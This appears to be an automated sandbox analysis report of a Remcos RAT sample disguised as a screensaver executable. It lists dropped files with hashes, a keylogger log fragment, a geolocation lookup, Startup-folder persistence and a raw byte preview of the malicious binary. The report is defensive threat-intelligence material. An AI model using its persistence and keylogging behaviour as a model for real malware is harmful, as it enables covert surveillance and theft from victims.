                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):16384
                                                                                                                                                                                                                            Entropy (8bit):0.07442822427879481
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:J4WetYerFQlGgXu83d03hCwmpZy1mpOXallOE/tlnl+/rTc:Jmzr9geUm3UwGyopOepMP
                                                                                                                                                                                                                            MD5:0D9CC2D7EFF8AC580D3771B94B7ED627
                                                                                                                                                                                                                            SHA1:669D73744E4DE7F9C2B658623A8776FFEFA9D72E
                                                                                                                                                                                                                            SHA-256:DCEC7AEF49BF9D4CF7339AF021170E9514C561C6C05CE116CFF8D917908AA367
                                                                                                                                                                                                                            SHA-512:FA12CC1837ED1C7A285E9EABBE1AA8EC1AF381DA9A991531240F7F650A7DBEAD125FB7CAC297E4CC8395C7202CD0EEC7CB480BD09A1C490BEC03994932CEA689
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:cXW......................................;...{..96...|...:...|...........:...|...:...|.....'.:...|u.................K..@.:...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):65536
                                                                                                                                                                                                                            Entropy (8bit):0.8252188256798091
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:u0yZP7du0BU/IjkZrCqzuiFPZ24IO8LFIh:WZPBVBU/IjUzuiFPY4IO8LKh
                                                                                                                                                                                                                            MD5:0DD0036057796015EB8B3137D61BC31A
                                                                                                                                                                                                                            SHA1:18A39811499475D8FEC6AB627FB4FB17BFC3C46B
                                                                                                                                                                                                                            SHA-256:40041BF0DB032CE42EDFEC6E37E2AB0CC69DF40286A6C78398772453172542DE
                                                                                                                                                                                                                            SHA-512:3FBB7290A051A3CCE5DF668DC773A9FD6A7F914320F120859E08EDB63F6AECABA4539A88548A64582F1B70DDA19EE62DC7E79F6365892124E80CED348522270B
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.6.6.0.8.9.6.6.2.0.1.8.9.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.6.6.0.8.9.7.3.0.7.6.9.5.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.3.0.a.c.1.0.-.a.c.8.d.-.4.0.8.7.-.9.6.c.0.-.8.e.1.f.a.e.f.5.b.9.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.3.4.7.7.3.5.8.-.4.f.7.d.-.4.7.1.8.-.a.7.8.e.-.f.8.0.b.d.2.4.5.5.7.7.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.F.A.T.6.7.8.9.0.9.8.7.0.0.9.0.0...s.c.r...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.F.o.r.S.u.r.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.e.4.-.0.0.0.1.-.0.0.1.4.-.c.0.8.6.-.c.f.f.7.1.d.4.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.b.0.1.a.4.2.f.4.3.9.0.0.2.7.4.b.2.b.5.1.f.b.b.4.a.4.6.b.8.4.7.0.0.0.0.0.0.0.0.!.0.0.0.0.8.c.b.3.9.d.e.9.7.c.3.6.e.b.8.3.2.8.4.3.6.f.f.e.2.1.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:Mini DuMP crash report, 14 streams, Tue Dec 3 00:54:56 2024, 0x1205a4 type
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):40184
                                                                                                                                                                                                                            Entropy (8bit):1.877477099075341
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:L0NUluWXwX/QO+cRVTlx5aJDZ4s59HyWe3kDlcRdL:hluWXIDlx5+IClcD
                                                                                                                                                                                                                            MD5:6F8095A0E7B1C42BE6D6673A3C6F33F9
                                                                                                                                                                                                                            SHA1:7133520B214A8D84D934E391794E7E5B262F6D13
                                                                                                                                                                                                                            SHA-256:C6C0A21A644F8F3C9B8F1B283F96D60614B314F07478B0391DDED5919FA71351
                                                                                                                                                                                                                            SHA-512:8B0E499CB0325FA6E77960AF3FAB3493CD8ED2A81A4FAF20BC816C519A507BF29FD38E217410BAF919A83D2197EF70250B2B9828C32202A464C42F9AC54B2598
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:MDMP..a..... ........VNg........................................t%..........T.......8...........T...............p...........H...........4...............................................................................eJ..............GenuineIntel............T............VNg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):8388
                                                                                                                                                                                                                            Entropy (8bit):3.708071571365445
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:192:R6l7wVeJT736z86Y97I6dDgmfkNqprn89bl0sfltXm:R6lXJTL6o6Y9k6dDgmfkNflnfW
                                                                                                                                                                                                                            MD5:81A9B6B1DC3E99292B136052D43E1100
                                                                                                                                                                                                                            SHA1:E08AA0FAB518D1CF0083A608B60423F9409EDD29
                                                                                                                                                                                                                            SHA-256:08B2C06875D003CC063876C64018A55640B3DE2FDC01051235858066B77FD6F5
                                                                                                                                                                                                                            SHA-512:4840B8120593495273AFD5297C09121B7DDA9A48A57D1C5BB318FB2C675D9F460DF53BDAAA870D9CD2863B073D75E8C06BE6F646BD5960D03BCACA59375F31E3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.5.2.<./.P.i.
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):4731
                                                                                                                                                                                                                            Entropy (8bit):4.520240140698675
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:48:cvIwWl8zsZCrJg77aI9KHuoWpW8VYfYm8M4JoM8KqFd6+q868WFwHr8kiPifd:uIjfIFI7mS7V/Jk66HIRKfd
                                                                                                                                                                                                                            MD5:DBB1DB78F8E528FBF073884594786D20
                                                                                                                                                                                                                            SHA1:05994F37BCCC0B0705B949F92F6151980ABF7543
                                                                                                                                                                                                                            SHA-256:6B4D2E10E8DC1931BA6C7C0D585D2537B8041A64BBEF023EBE321F67C4FAF3C2
                                                                                                                                                                                                                            SHA-512:C203F4833172A51B9046D7B03ABF9544C540B330B807F4A65B32FF3985995F8AC12D29755B623047659B9B03CBCA79777F3D723EB1227C887C5711D9E6410C1D
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="614397" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):232
                                                                                                                                                                                                                            Entropy (8bit):3.4403944709083705
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:6lZtNHc5YcIeeDAlOWA7DxbN2fxlPCMm0v:6ljaec0WItN2LPCMl
                                                                                                                                                                                                                            MD5:DF7DDBB7F80A233F64E347B5C1CEF945
                                                                                                                                                                                                                            SHA1:EEA65B20C6980BD1C8E2E5BE075D8E7EC181E178
                                                                                                                                                                                                                            SHA-256:45EBB7C27FD8D1C5411B6E378C1E1BBFFCECDA39ACA5A09E0E794A4F120FFF9E
                                                                                                                                                                                                                            SHA-512:86B1199856567E06A20F3B962B9AA1B24BD526787D9131169B0720F1784F728287184FAAFE51A26694A628CF563740BB7129206C21E0F756E9FAD1D7FCA855BB
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                                                                                                                                            Preview:....[.2.0.2.4./.1.2./.0.2. .1.9.:.5.5.:.0.8. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........{. .U.s.e.r. .h.a.s. .b.e.e.n. .i.d.l.e. .f.o.r. .7.0.9.0.2. .m.i.n.u.t.e.s. .}.....
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):963
                                                                                                                                                                                                                            Entropy (8bit):5.014904284428935
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:tkluJnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkwV:qluNdRNuKyGX85jvXhNlT3/7AcV9Wro
                                                                                                                                                                                                                            MD5:B66CFB6461E507BB577CDE91F270844E
                                                                                                                                                                                                                            SHA1:6D952DE48032731679F8718D1F1C3F08202507C3
                                                                                                                                                                                                                            SHA-256:E231BBC873E9B30CCA58297CAA3E8945A4FC61556F378F2C5013B0DDCB7035BE
                                                                                                                                                                                                                            SHA-512:B5C1C188F10C9134EF38D0C5296E7AE95A7A486F858BE977F9A36D63CBE5790592881F3B8D12FEBBF1E555D0A9868632D9E590777E2D3143E74FD3A44C55575F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{. "geoplugin_request":"8.46.123.228",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1248
                                                                                                                                                                                                                            Entropy (8bit):5.370576209173007
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24:3vZWSKco4KmBs4RPT6BmFoUebIKomjKcmZ9tXt/NK3R8UHrx:hWSU4y4RQmFoUeWmfmZ9tlNWR8Wt
                                                                                                                                                                                                                            MD5:3FB3D0544BDF233A410F17EC5EDB5075
                                                                                                                                                                                                                            SHA1:92DD40560C86924B32347AF007F38750A25D19E5
                                                                                                                                                                                                                            SHA-256:C55317DC391339B025E39019536804AB0E863C65F327AC22CDD6A2F66591750F
                                                                                                                                                                                                                            SHA-512:F5EEBA99CC255217352FCC11F0FBC139D709732DBA99AEA3DBE5DFB002912B736AF857B98EB8FA92C9A9C590C67BE0A77078482CA20DBD74AB9E30CD8121A312
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:@...e.................................l..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.D....................+.H..!...e........System.Configuration.Ins
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x739c7577, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):20447232
                                                                                                                                                                                                                            Entropy (8bit):1.2830214663990038
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:xRSPOhijljKhBfvKDv2G+555ckQB8WBbXnE:uii9PDp+
                                                                                                                                                                                                                            MD5:9C25ECCBDDFEB57C62E33392C66A926D
                                                                                                                                                                                                                            SHA1:E33A3A31E1D6F276448AA9BB86BB3D67DE3253A7
                                                                                                                                                                                                                            SHA-256:B38DC9599792BFE0FB049446EF6038AB203F13E2CC1227B7D09B34B6321F6DF9
                                                                                                                                                                                                                            SHA-512:ACD6FB87B8DF1E9021576BFD2CF22B479A186834B5EB3446C64189835D8C956A2B7D5D5EE14529D290956FA3A562DCEA9FE0E4DE89CA55CB947E4B44AAAB2042
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:s.uw... ........=......J}...0...{........................"..........{5......{..h.$..........................3.s.0...{..............................................................................................c...........eJ......n........................................................................................................... ............{...................................................................................................................................................................................................{;.................................cj.:.....{..................-tQ......{...........................#......h.$.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\.exe
                                                                                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Qn:Qn
                                                                                                                                                                                                                            MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                                                                                                                                            SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                                                                                                                                            SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                                                                                                                                            SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:..
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):877056
                                                                                                                                                                                                                            Entropy (8bit):7.740162672933695
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:24576:KdeRzboLmkwWQ6Q2l/4SPTIXkORnLeV35YryHC:CyO37l5TkzRLePYryHC
                                                                                                                                                                                                                            MD5:B7B504EA022610FE69940FD54FD2BC27
                                                                                                                                                                                                                            SHA1:8CB39DE97C36EB8328436FFE21BE24742925E652
                                                                                                                                                                                                                            SHA-256:4C5BEA1FA5F8547DE2A03C6117E10A023D76EDC17DF923C5F8031BFA74E12E87
                                                                                                                                                                                                                            SHA-512:4F38F6FF589CB607C2CBD5BE4BE78C5DFFE9F03723EC9C9EEE9C606B9A8143ADE83DBD3C2639F2401EE47232B899FB9DBE9DDE7FEA5196C31483D2B552F4B313
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                                                                                                            • Antivirus: Virustotal, Detection: 63%, Browse
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..X..........^w... ........@.. ....................................@..................................w..K.................................................................................... ............... ..H............text...dW... ...X.................. ..`.rsrc................Z..............@..@.reloc...............`..............@..B................@w......H........`..........Z.......x~..........................................!.@.#.$.%.^.&.*.(.).-._.=.+........................|P.i.8....h.K.+........... ...............f.Z2:k..zY.E...........................:...+y._.r..c..".(J....*.sK........*.sK........*VsK........(S........*.sK........*B.{.....(...+...*&.(J.....*".......*".(b....*VsU...(c...t.........*j.(w.....(x....sW...(y....*F......(z...(\...*..-..+..(...+%-.&.+..o|...o}...%-.&(~...*"..(_...*"..(_...*6.,...o....*.*b..o....
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                            Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):55
                                                                                                                                                                                                                            Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                            MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                            SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                            SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                            SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1835008
                                                                                                                                                                                                                            Entropy (8bit):4.465691554607519
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:sIXfpi67eLPU9skLmb0b4TWSPKaJG8nAgejZMMhA2gX4WABl0uN+dwBCswSbI:RXD94TWlLZMM6YFHU+I
                                                                                                                                                                                                                            MD5:77DA3ACF8D4923202440C90354C3A141
                                                                                                                                                                                                                            SHA1:43E1AFE75A6E9676149D032DB27D335C19A55FE3
                                                                                                                                                                                                                            SHA-256:296852BFD332C1BC737F3895186F839048D0D24CE8388D851406576CC7EDB932
                                                                                                                                                                                                                            SHA-512:B121F00AEF937CB87A1EE5BD69EA73CDC8DF7EF984CE087910B1A3233BD1FCB6C837ECCE3B7EA117344E177C8964AA22D3A00BD2E61394F16D4FB2877B8F4089
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ....E...............................................................................................................................................................................................................................................................................................................................................B..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                            Entropy (8bit):7.740162672933695
                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                            File name:FAT6789098700900.scr.exe
